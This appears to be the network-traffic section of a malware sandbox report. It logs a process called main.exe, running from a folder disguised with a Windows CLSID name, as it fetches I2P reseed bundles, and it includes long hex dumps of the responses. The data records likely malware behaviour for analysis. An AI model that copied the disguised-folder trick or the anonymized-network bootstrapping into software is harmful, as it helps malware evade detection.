0	192.168.2.6	49798	95.216.2.172	443	5252	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 18:30:21 UTC	102	OUT	GET https://reseed.memcpy.io:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
2024-10-12 18:30:22 UTC	247	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 32 30 30 20 4f 4b 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 69 32 70 73 65 65 64 73 2e 73 75 33 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 37 32 37 39 36 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 6c 69 6d 69 74 3a 20 34 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 6d 61 69 6e 69 6e 67 3a 20 33 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 73 65 74 3a 20 39 30 30 0d 0a 64 61 74 65 3a 20 53 61 74 2c 20 31 32 20 4f 63 74 20 32 30 32 34 20 31 38 3a 33 30 3a 32 32 20 47 4d 54 0d 0a 0d 0a Data Ascii: HTTP/1.0 200 OKcontent-disposition: attachment; filename=i2pseeds.su3content-length: 72796content-type: application/octet-streamx-ratelimit-limit: 4x-ratelimit-remaining: 3x-ratelimit-reset: 900date: Sat, 12 Oct 2024 18:30:22 GMT
2024-10-12 18:30:22 UTC	14998	IN	Data Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 10 00 00 00 00 00 01 1a 14 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 32 38 35 38 36 37 39 38 00 00 00 00 00 00 68 6f 74 74 75 6e 61 40 6d 61 69 6c 2e 69 32 70 50 4b 03 04 14 00 08 00 08 00 a7 5d 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 56 45 68 49 36 6e 75 63 38 2d 57 58 4d 45 57 6e 6c 55 33 78 63 70 55 73 4e 70 4e 71 69 53 66 4b 75 47 56 34 37 74 45 42 57 6f 30 3d 2e 64 61 74 55 54 05 00 01 4b be 07 67 ba f9 42 40 99 61 7e 50 63 61 56 45 d5 c1 c9 6f ca c5 7c fc ce 31 5c 3f 7e 8e cd b3 7c 76 9f fd 14 a6 2d e5 61 ef fa 5e f7 9e 9a d6 73 21 70 0e c3 af f7 fb bd cb 66 24 c6 e9 f5 3b 7f 9e 35 5d cf 50 45 67 54 1e bf bc 98 77 ae 78 2f fb 5f a3 3b 7d 73 a7 ed Data Ascii: I2Psu31728586798hottuna@mail.i2pPK]JY;routerInfo-VEhI6nuc8-WXMEWnlU3xcpUsNpNqiSfKuGV47tEBWo0=.datUTKgB@a~PcaVEo\|1\?~\|v-a^s!pf$;5]PEgTwx/_;}s
2024-10-12 18:30:22 UTC	1072	IN	Data Raw: 41 58 78 47 30 77 59 44 4d 30 56 4a 50 59 5a 55 76 7e 55 44 6e 54 68 6a 63 47 67 58 53 2d 7e 75 61 6c 32 41 7a 38 44 52 4e 6f 3d 2e 64 61 74 55 54 05 00 01 93 c9 07 67 e2 5f f4 7f c5 a6 97 cf 22 24 8b d4 4b e6 b9 84 ee d4 76 6b 0d dc 2a e8 7a bf d7 ee aa 54 f9 f2 00 a9 27 53 e7 55 bb ec d8 29 7f c4 52 c8 67 de 82 94 d7 52 ea bc ad 7b 4b 04 1f 3a f3 46 7c 08 90 53 9b 3f 2a 8f 5f 7e c1 5a 86 1a 1d c6 44 03 0b f3 a3 13 ff 5f cb 48 11 dc 2c 7e 23 e2 e9 dd a9 76 3b f5 78 d2 76 3f ef 61 65 60 61 60 67 60 61 60 60 9c 54 b1 c7 2b 8c 85 8f 01 0a 58 fd 42 9c 03 8c 18 1c 58 92 13 0b 8a 6d 19 4d ac 19 8b 6d 75 42 5d bd 93 12 1d 7d a3 74 3d 22 ab 52 9d cc cb f3 cd 53 53 93 dc 42 83 cd 3d 83 cc 52 2a c2 7c 33 3c 0a 75 4b dc fc a2 ea 0c f3 6d ad 19 cb 6c 19 8d ac 99 71 Data Ascii: AXxG0wYDM0VJPYZUv~UDnThjcGgXS-~ual2Az8DRNo=.datUTg_"$KvkzT'SU)RgR{K:F\|S?_~ZD_H,~#v;xv?ae`a`g`a``T+XBXmMmuB]}t="RSSB=R*\|3<uKmlq
2024-10-12 18:30:22 UTC	15248	IN	Data Raw: 4e 5e 91 25 25 39 a5 3e 65 65 91 ba a1 a6 85 f9 39 45 11 e6 ee b9 4e e5 ce 8e 91 95 4e 45 51 9e 75 85 fe ee 85 41 d9 b6 d6 8c 65 b6 8c 46 d6 5c 30 47 b2 fa 85 38 07 18 31 94 e3 74 9b 44 71 50 58 68 78 6a ae bb 7b b2 59 6e 65 4a aa 57 a1 53 4e a4 4f a0 2d 16 77 e4 26 19 38 67 3b 9b 5b 1a a7 06 e4 44 99 18 f8 e4 5a 04 86 85 9a 5a 46 55 46 98 1b 85 18 24 87 04 05 26 57 e6 5a ba 85 67 95 bb c2 dc c1 c0 a0 03 0d 1f 9f 20 6b d6 bc d4 12 cf 14 90 30 5f 51 7e 69 49 6a 91 5e 59 6a 51 71 66 7e 9e 2d 9b 81 9e a5 9e 99 89 35 e3 6d eb 32 d3 e9 bb 7d 8d 7f dc 12 ac fb e9 b9 53 ed 8a 99 e4 cf 88 6d 11 1d 0b 53 ce db 71 dd 66 ff 21 a8 23 7b d4 d8 96 e5 fc dc c5 e7 82 cd ad 97 b9 f6 1d 6b 6a 37 e9 d5 9b 78 f3 6a 43 52 e1 75 06 40 00 00 00 ff ff 50 4b 07 08 43 a6 f7 fd e1 Data Ascii: N^%%9>ee9ENNEQuAeF\0G81tDqPXhxj{YneJWSNO-w&8g;[DZZFUF$&WZg k0_Q~iIj^YjQqf~-5m2}SmSqf!#{kj7xjCRu@PKC
2024-10-12 18:30:22 UTC	16320	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 7a 34 4d 59 6d 67 38 30 75 71 66 56 41 7a 55 49 34 6e 46 66 50 67 69 2d 68 58 70 67 76 44 54 46 77 39 79 7a 4d 38 51 4a 4d 49 73 3d 2e 64 61 74 55 54 05 00 01 3b e1 07 67 5a 9d b2 6a bd eb a5 22 e3 47 2c ce 06 ef bc 64 f9 eb 82 42 bd 98 85 b5 67 58 54 f3 d8 73 bd 5f af 7a ae 45 64 da 27 95 99 21 27 fb 2e fe 9f 12 d7 ba d1 c2 b0 f2 e2 8b 9b cb 8d 1f ee 7f de 16 10 d4 fa a6 67 e9 76 9e 4f 6b df f9 54 6f da c0 31 f3 ce 99 9f e2 2e b2 9e 0b 23 7a 4f 8b cb cf 29 e4 7b fe d5 82 bd cb fd 43 55 f1 5f fd dd 9b 5e 5d 59 e7 f8 e9 c9 e3 0a df 02 26 93 c9 ab 9d 56 fc fc 3f a1 9d 6b f6 cd ed 73 4b 3c 3e b6 07 1d dc b2 73 f1 34 8d ae 43 ed cf b8 fb 23 5d 79 df ac 0c 9d 13 dd fa 9f 69 a3 01 db Data Ascii: ;routerInfo-z4MYmg80uqfVAzUI4nFfPgi-hXpgvDTFw9yzM8QJMIs=.datUT;gZj"G,dBgXTs_zEd'!'.gvOkTo1.#zO){CU_^]Y&V?ksK<>s4C#]yi
2024-10-12 18:30:22 UTC	16320	IN	Data Raw: ed de ed b4 e3 1f 04 be 5a 97 94 71 98 b5 bb b8 ea c1 14 7a e8 c1 ef be 7f 64 92 74 c9 e3 92 74 89 44 da 29 9e ce 8e a7 65 4b fe 3b 59 95 59 6b 80 24 2f a5 3b 6c 2d 21 52 8a a8 a4 21 52 1e 81 90 32 bf a1 99 01 ed 60 a3 d1 e0 b4 d8 28 c8 60 f3 d6 08 44 05 4d 10 2e da df 54 c3 9b d4 56 7b 80 f6 ba 49 95 34 42 4a 21 d5 9a e5 c2 74 93 89 85 a4 97 ff ef e3 48 b9 87 62 b7 35 29 22 90 b1 dc 5f 2b 1a 75 1e 9b 51 07 86 5c b8 46 40 ea 9c 68 cc 01 1b 83 4e ce 82 02 21 31 54 41 aa 64 9c 4b 6c 01 c8 0c 10 83 70 14 80 09 44 99 22 70 99 94 4a 00 4e 11 b4 4c 28 a6 04 52 04 2f 13 86 e0 b0 6a 05 e7 01 48 79 14 a0 60 45 88 27 b0 04 ab 6b 2a d7 d3 16 9f 82 f5 ea 31 73 05 c1 13 6e 1b 13 65 5c 60 95 5d e1 ae 31 f1 08 b9 18 01 49 39 45 80 65 4a c1 ce 03 2d 6c ac b6 b2 8a 47 29 Data Ascii: ZqzdttD)eK;YYk$/;l-!R!R2`(`DM.TV{I4BJ!tHb5)"_+uQ\F@hN!1TAdKlpD"pJNL(R/jHy`E'k*1sne\`]1I9EeJ-lG)
2024-10-12 18:30:22 UTC	8838	IN	Data Raw: 57 9b df 02 00 00 7a 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 45 0b 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 4d 6b 56 49 66 6b 67 4c 7e 6c 68 55 2d 6d 46 55 7a 45 37 49 52 49 53 6b 6d 56 75 4f 53 77 62 6a 52 2d 63 74 66 7e 63 75 4d 4d 30 3d 2e 64 61 74 55 54 05 00 01 8e bf 07 67 50 4b 01 02 14 00 14 00 08 08 08 00 55 64 4a 59 5f 06 e5 8a de 01 00 00 25 03 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 96 0e 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 35 43 67 4f 4a 48 4f 49 42 47 51 7e 47 74 6c 31 59 61 72 6a 6f 37 4e 58 62 71 67 6c 72 56 45 62 46 67 56 64 41 49 31 4d 73 6c 51 3d 2e 64 61 74 55 54 05 00 01 e3 c9 07 67 50 4b 01 02 14 00 14 00 08 00 08 00 e0 6e 4a 59 17 fe 67 e3 94 04 00 00 e2 05 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 e6 10 00 Data Ascii: Wz;ErouterInfo-MkVIfkgL~lhU-mFUzE7IRISkmVuOSwbjR-ctf~cuMM0=.datUTgPKUdJY_%;routerInfo-5CgOJHOIBGQ~Gtl1Yarjo7NXbqglrVEbFgVdAI1MslQ=.datUTgPKnJYg;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	50004	144.172.118.154	443	5164	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 18:31:26 UTC	108	OUT	GET https://reseed.stormycloud.org:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
2024-10-12 18:31:26 UTC	247	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 32 30 30 20 4f 4b 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 69 32 70 73 65 65 64 73 2e 73 75 33 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 38 32 39 30 36 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 6c 69 6d 69 74 3a 20 34 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 6d 61 69 6e 69 6e 67 3a 20 33 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 73 65 74 3a 20 39 30 30 0d 0a 64 61 74 65 3a 20 53 61 74 2c 20 31 32 20 4f 63 74 20 32 30 32 34 20 31 38 3a 33 31 3a 32 36 20 47 4d 54 0d 0a 0d 0a Data Ascii: HTTP/1.0 200 OKcontent-disposition: attachment; filename=i2pseeds.su3content-length: 82906content-type: application/octet-streamx-ratelimit-limit: 4x-ratelimit-remaining: 3x-ratelimit-reset: 900date: Sat, 12 Oct 2024 18:31:26 GMT
2024-10-12 18:31:26 UTC	14050	IN	Data Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 15 00 00 00 00 00 01 41 8d 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 32 38 37 35 31 35 30 31 00 00 00 00 00 00 61 64 6d 69 6e 40 73 74 6f 72 6d 79 63 6c 6f 75 64 2e 6f 72 67 50 4b 03 04 14 00 08 08 08 00 e4 bc 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 55 30 66 37 44 49 61 69 67 67 72 38 67 65 2d 58 49 4e 78 34 4d 33 77 55 42 61 46 66 31 47 4f 68 47 32 78 43 43 75 49 53 7e 66 45 3d 2e 64 61 74 55 54 05 00 01 1c b7 09 67 fa 2e ef 24 fb 3a e2 b5 4d ef 35 1d f1 de 6d 72 45 e7 8c e5 9a ba 8b 77 4a 88 39 2f e1 dc fa 67 61 ba 4b 9a 3f f3 a2 ac 1d 3b 9d 76 7c be b9 ea 72 e3 9e 2e 6d b1 f4 14 ff 88 9f c1 55 ff 75 df 34 cf c9 19 95 c7 2f 6f 7f 85 67 d5 72 eb 5b 87 Data Ascii: I2Psu3A1728751501admin@stormycloud.orgPKKY;routerInfo-U0f7DIaiggr8ge-XINx4M3wUBaFf1GOhG2xCCuIS~fE=.datUTg.$:M5mrEwJ9/gaK?;v\|r.mUu4/ogr[
2024-10-12 18:31:26 UTC	2920	IN	Data Raw: 6a 19 96 99 6f 98 99 5d 6c 6b cd 58 66 cb 68 64 8d ee 10 07 96 e4 c4 82 62 5b 46 33 72 0d e4 80 19 c8 12 1c 1c 6a c4 30 0d 62 1e 93 93 b3 35 6e 2f ea 38 39 9b e6 67 97 b8 39 07 25 87 3a 97 ba 05 9a fb a5 9b 85 06 a5 16 9b 66 1a 7a 57 16 79 3a 1b d4 19 99 b8 1a 17 d5 45 f9 9b 26 63 f1 b6 a7 6e 56 52 a5 73 50 69 6a 9d 69 61 a6 a5 73 98 6f 98 4f 66 45 46 a2 45 a6 57 9d 73 70 46 9a bb 51 7e 45 92 99 a7 8b ae af 73 32 0e 57 16 22 7c 4d aa 6b c8 74 00 03 83 2e c4 4e e6 80 20 57 6b d6 bc d4 12 cf 14 90 38 5f 51 7e 69 49 6a 91 5e 59 6a 51 71 66 7e 9e 2d 9b 81 9e a5 9e 99 b1 f5 87 c3 5b af 66 d6 d8 cc 48 fc f2 5d 7b a5 ea cd 1b 06 e2 3e 77 3f 56 7c 2f 98 f8 3c ff c8 2f e1 75 7b a5 9d c3 e7 4d 9b 27 20 28 f7 6c cf af 09 97 73 dd d4 ac b6 e6 56 2f 09 e9 d9 5a f2 3e Data Ascii: jo]lkXfhdb[F3rj0b5n/89g9%:fzWy:E&cnVRsPijiasoOfEFEWspFQ~Es2W"\|Mkt.N Wk8_Q~iIj^YjQqf~-[fH]{>w?V\|/</u{M' (lsV/Z>
2024-10-12 18:31:26 UTC	2920	IN	Data Raw: 94 b2 64 e4 17 97 d8 f2 18 1a 58 ea 19 9a 99 ea 19 e8 59 5a 58 33 66 da 4a 04 e5 bb e4 84 7b 15 9b 55 85 a7 79 7b 18 25 87 78 18 a5 07 55 05 da da 5a b3 14 e4 17 95 d8 b2 1a 99 1a 19 1b 58 33 16 db ea b8 7b 25 a7 39 59 64 65 78 25 1b fa 94 17 46 95 e4 7b 14 7a 57 ea fa f9 59 f8 98 55 84 1b a6 98 96 07 96 ba 26 66 18 97 17 38 3a da 5a 33 96 d9 32 1a 59 73 c0 5c c1 12 1c 1c 6a c4 30 99 25 39 b1 a0 d8 96 c9 c9 d9 1a 87 73 74 52 2a 92 4d 4d 23 83 43 b3 22 fc bc 0a b2 42 f3 75 8d c3 7d 4c 4b c3 dc 2c dc 42 52 9d f3 d2 ab 7c 8c 02 3c 4b fc fd 5d 4d 43 4d b0 38 31 d8 cb 22 28 29 22 29 d5 25 ad c8 dd b7 28 23 a7 4a 37 3b 33 c3 a9 3c d5 3b d2 2c ac d8 a8 2e d8 d0 bf 22 23 ab b2 3c ac 24 dd 13 e6 44 06 86 64 88 ab 58 fc d3 82 5c ad 59 f3 52 4b 3c 53 40 12 22 79 a9 Data Ascii: dXYZX3fJ{Uy{%xUZX3{%9Ydex%F{zWYU&f8:Z32Ys\j0%9stR*MM#C"Bu}LK,BR\|<K]MCM81"()")%(#J7;3<;,."#<$DdX\YRK<S@"y
2024-10-12 18:31:26 UTC	2920	IN	Data Raw: 0e df 6f c3 77 1e 3e a9 e6 ac 72 67 5e cf e5 cf 58 72 47 20 e6 c8 ac 09 e9 0a 49 f6 a3 f2 f8 e5 4d 53 13 b4 f7 72 26 f8 2c d8 a4 da f6 70 c9 c1 ae 12 e3 0a 5d 59 a7 49 6b 37 34 05 56 b6 ec 4e dd ce ca c0 c2 c0 ce c0 c2 c0 c0 38 a9 fe cb f3 6e 26 66 06 28 60 f5 0b 71 0e 30 62 28 65 c9 c8 2f 2e b1 e5 31 d2 33 34 37 d7 33 37 d0 33 34 33 b2 66 cc b4 95 f0 f4 f2 31 b4 4c 76 34 71 cc f0 70 77 4c 74 a9 f3 0d 2f c9 d3 0d b4 b5 b5 66 29 c8 2f 2a b1 65 35 b2 30 30 33 b3 66 2c b6 d5 09 ce 2f 8c 4c f5 37 74 74 ae cb 77 73 2c 76 77 77 a9 0a c9 29 f5 d7 0d 2f ae 72 4c 4e ac 32 b3 88 aa f3 35 f3 cb 2c 37 0d 74 8b b4 b5 66 2c b3 65 34 b2 e6 80 b9 82 25 38 38 d4 88 61 32 4b 72 62 41 b1 2d 93 93 b3 35 0e e7 e8 98 96 1b 05 1a 05 87 9a 16 fb bb 45 59 fa 65 99 16 78 fa 96 b8 Data Ascii: ow>rg^XrG IMSr&,p]YIk74VN8n&f(`q0b(e/.134737343f1Lv4qpwLt/f)/*e5003f,/L7ttws,vww)/rLN25,7tf,e4%88a2KrbA-5EYex
2024-10-12 18:31:26 UTC	2920	IN	Data Raw: 32 dd d7 31 c0 34 d7 a0 34 aa 28 ab ce b8 d2 3f b9 b0 cc 3f bd ca cd d1 d6 9a b1 cc 96 d1 c8 9a 03 e6 0e 96 e0 e0 50 23 86 a9 2c c9 89 05 c5 b6 4c 4e ce d6 38 1d a4 53 64 19 60 99 ee 1c 52 e4 16 90 e6 16 12 11 5a 9e 92 e5 67 12 1e 68 12 e2 18 15 9c 6e ea 59 94 1b ec 61 56 a2 1b e2 ec 9e 5d 62 81 c5 91 5e 2e 65 25 e6 89 69 ee 1e ae e5 41 d9 a6 55 6e be 95 41 c6 c5 86 96 fe ae 51 49 01 5e 75 9e 45 16 95 81 19 a5 6e 95 5e 96 2e 9e 30 47 32 30 e8 40 dd 15 11 64 cd 9a 97 5a e2 99 02 12 e6 2b ca 2f 2d 49 2d d2 2b 4b 2d 2a ce cc cf b3 65 33 d0 b3 d4 33 33 b1 be f3 67 53 f9 73 0f 31 96 ee 6b 87 bc be e5 ab bb ff c9 34 ae 3a 63 7d f0 df 4b a7 cf 47 8b 59 4f cf f7 78 ff 63 35 ab 9f fd f5 4f 49 cb 1d d8 1f b7 cd e4 4c ce cd ae b8 de fe 55 fd f5 bd 0b 9c 57 ed f8 00 Data Ascii: 2144(??P#,LN8Sd`RZghnYaV]b^.e%iAUnAQI^uEn^.0G20@dZ+/-I-+K-*e333gSs1k4:c}KGYOxc5OILUW
2024-10-12 18:31:26 UTC	2920	IN	Data Raw: 71 66 7e 9e 2d 9b 81 9e a5 9e 99 b1 75 44 d1 a5 fd ff bc 76 3d 3f 25 b3 7a 85 db a2 bc a6 a9 9a f7 b7 08 0b d4 79 95 e9 76 2c ea 2c b5 f6 2f 0c 31 fd f1 7f 95 7d 90 fd cb bf aa 17 66 5e e3 99 e5 6e 70 49 b3 35 31 ac a3 f1 f6 e2 95 1c e7 18 00 01 00 00 ff ff 50 4b 07 08 d6 12 c6 29 df 01 00 00 28 03 00 00 50 4b 03 04 14 00 08 00 08 00 f4 83 4c 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6d 48 62 54 42 42 57 36 6c 62 70 43 43 77 37 4d 59 4d 62 41 48 6d 47 44 64 61 7a 57 79 6a 55 76 30 74 72 37 6d 62 6f 4b 49 65 41 3d 2e 64 61 74 55 54 05 00 01 6c a4 0a 67 d2 ab 6b b6 98 df 68 bb 77 ee e7 88 0b 3b a5 99 5b 5e 2b 19 f2 c8 87 6b 28 f1 07 bc df f9 c9 cc 5c 84 95 eb a5 e3 af b7 dc e7 57 ed 4a 5c f2 65 4a c6 7c e6 94 ab 5b Data Ascii: qf~-uDv=?%zyv,,/1}f^npI51PK)(PKLY;routerInfo-mHbTBBW6lbpCCw7MYMbAHmGDdazWyjUv0tr7mboKIeA=.datUTlgkhw;[^+k(\WJ\eJ\|[
2024-10-12 18:31:26 UTC	2920	IN	Data Raw: 70 30 6e 69 75 66 5a 33 53 74 57 65 55 3d 2e 64 61 74 55 54 05 00 01 b4 76 0a 67 fa 7f 6c 5a bf b7 61 f5 ad 6b 01 12 bd a7 57 ec 7f d1 6b c3 ee 17 cd b8 a5 29 35 f4 62 83 d2 8a 59 2a 39 bb 52 ef 84 a6 70 6e 2a 38 e6 74 a6 e9 71 47 d8 cc c4 0b e7 4e be 3c e9 f4 fe e5 aa 9b a1 7f ab 3e 8c ca e3 97 97 af de 74 da e9 f5 31 f5 97 f6 5b a7 78 7b fe 7e 74 29 28 f1 7d ef ad 50 5f 95 d5 ca cb df ee da 37 9b 95 81 85 81 9d 81 85 81 81 71 52 c3 fd f5 13 58 98 19 a0 80 d5 2f c4 39 c0 88 a1 9c 25 23 bf b8 c4 96 cf d0 d4 50 cf c8 c4 40 cf d0 48 cf d0 c2 c4 9a 31 d3 56 c2 22 c7 d1 b7 b0 2c c8 b3 bc 28 2d 37 cd 37 3b 3d b8 2a d9 39 c3 d1 d6 d6 9a a5 20 bf a8 c4 96 d5 c8 d0 d0 c8 c8 9a b1 d8 56 c7 d9 cc c2 33 c8 df 32 d2 3b af 34 3c a5 b0 ce 22 bf 2a 2c cc 24 43 37 d5 38 Data Ascii: p0niufZ3StWeU=.datUTvglZakWk)5bY9Rpn8tqGN<>t1[x{~t)(}P_7qRX/9%#P@H1V",(-77;=9 V32;4<",$C78
2024-10-12 18:31:26 UTC	2920	IN	Data Raw: 74 83 dc b0 f4 b0 fc c4 60 c7 48 0b e3 50 bf e4 f2 28 9f aa 3c d3 0c 67 97 aa 48 63 af a0 b2 fc cc c8 54 0b 97 88 14 af 88 b2 7c 5b 6b 96 82 fc a2 12 5b 16 43 63 63 73 6b c6 62 5b 9d 6c f7 dc a8 80 c4 a4 4c af b4 d0 ba a0 54 17 f7 0a bf 28 03 cb 44 c7 cc 1c b7 cc 80 c2 dc 8a a0 f2 d4 ec 40 b3 52 e7 d2 c0 bc 64 5b 6b c6 32 5b 46 23 6b 56 54 f7 4e 41 77 2f 9f a1 91 a5 9e a1 a9 a1 9e 91 81 a5 9e 89 f9 80 b8 91 0b e6 46 56 bf 10 e7 00 23 86 32 9c 4e 93 70 c9 36 4b 74 4e cf 28 2b b2 28 f2 75 0a b7 cc 4f 0b 0c 49 2d 2e b7 c5 74 86 61 7a 4a 51 a6 79 45 64 44 60 94 61 9d ab 49 a5 61 b6 77 9a 67 60 59 aa 47 9e 8f 71 65 62 44 91 a3 b7 49 48 ae 8b b3 a1 63 b0 2b 2e 67 34 11 15 a3 34 75 12 03 23 17 24 c2 98 23 82 5c ac d9 d2 12 73 33 73 2a 6d 59 13 73 4a 8a 12 ad b9 Data Ascii: t`HP(<gHcT\|[k[Cccskb[lLT(D@Rd[k2[F#kVTNAw/FV#2Np6KtN(+(uOI-.tazJQyEdD`aIawg`YGqebDIHc+.g44u#$#\s3s*mYsJ
2024-10-12 18:31:26 UTC	2920	IN	Data Raw: ca 52 8b 8a 33 f3 f3 6c d9 0c f4 2c f5 cc 8c ad b7 29 ae ff 22 ab 24 e2 22 f0 b2 2e d5 ab ea d9 9b aa 7d df b4 aa b7 fd 7c e2 73 e9 59 9d 68 93 6f 94 81 d3 1f eb c9 6f 0d bc 63 db 57 9e ea be 27 9a 64 62 bf e7 4f bc a5 ef e4 73 bd ff cf f1 df 4b e0 07 04 00 00 ff ff 50 4b 07 08 32 24 34 01 f5 01 00 00 01 04 00 00 50 4b 03 04 14 00 08 00 08 00 08 7f 4c 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6e 6d 53 34 74 62 67 67 69 4c 43 72 6b 4b 58 48 72 78 4d 5a 45 51 4b 67 48 69 4e 72 57 53 32 63 5a 52 68 2d 2d 46 30 50 66 61 30 3d 2e 64 61 74 55 54 05 00 01 20 9c 0a 67 3a fa 5e fe 2e 57 5f c9 6e f3 8b f9 13 55 43 94 44 27 6d f8 19 f5 ce 62 e5 b3 3f 5f dd fc 5c ef c7 85 1c 71 4a 98 2a b0 b0 c8 7d a3 13 f7 62 11 7e 9d 29 8e Data Ascii: R3l,)"$".}\|sYhoocW'dbOsKPK2$4PKLY;routerInfo-nmS4tbggiLCrkKXHrxMZEQKgHiNrWS2cZRh--F0Pfa0=.datUT g:^.W_nUCD'mb?_\qJ*}b~)

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.6	50016	144.172.118.154	443

Timestamp	Bytes transferred	Direction	Data
2024-10-12 18:32:05 UTC	108	OUT	GET https://reseed.stormycloud.org:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
2024-10-12 18:32:05 UTC	247	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 32 30 30 20 4f 4b 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 69 32 70 73 65 65 64 73 2e 73 75 33 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 38 36 30 38 31 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 6c 69 6d 69 74 3a 20 34 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 6d 61 69 6e 69 6e 67 3a 20 33 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 73 65 74 3a 20 39 30 30 0d 0a 64 61 74 65 3a 20 53 61 74 2c 20 31 32 20 4f 63 74 20 32 30 32 34 20 31 38 3a 30 36 3a 30 35 20 47 4d 54 0d 0a 0d 0a Data Ascii: HTTP/1.0 200 OKcontent-disposition: attachment; filename=i2pseeds.su3content-length: 86081content-type: application/octet-streamx-ratelimit-limit: 4x-ratelimit-remaining: 3x-ratelimit-reset: 900date: Sat, 12 Oct 2024 18:06:05 GMT
2024-10-12 18:32:05 UTC	11130	IN	Data Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 15 00 00 00 00 00 01 4d f4 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 32 38 37 34 39 37 30 33 00 00 00 00 00 00 61 64 6d 69 6e 40 73 74 6f 72 6d 79 63 6c 6f 75 64 2e 6f 72 67 50 4b 03 04 14 00 08 00 08 00 08 39 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 45 30 44 65 4b 4e 55 4a 6e 63 79 4f 70 7a 2d 65 37 49 66 66 7a 41 6b 51 59 34 51 48 50 4c 42 71 75 4f 4b 47 4f 74 48 77 51 42 55 3d 2e 64 61 74 55 54 05 00 01 61 7d 07 67 d2 e0 fa b3 f0 64 a3 56 cb 8d dd bb 42 13 de 77 f6 af 49 be a4 7b a1 55 94 f3 f5 b5 65 a6 8f bf f4 4b 54 1e e5 f8 58 db 21 fe f3 cf 8c 6b c2 e5 31 2b 9e 18 17 da 96 cf db d0 e3 e6 ec 77 c0 6d 9a 16 57 ee a8 3c 7e 79 99 4f 46 75 73 d3 b7 de Data Ascii: I2Psu3M1728749703admin@stormycloud.orgPK9JY;routerInfo-E0DeKNUJncyOpz-e7IffzAkQY4QHPLBquOKGOtHwQBU=.datUTa}gdVBwI{UeKTX!k1+wmW<~yOFus
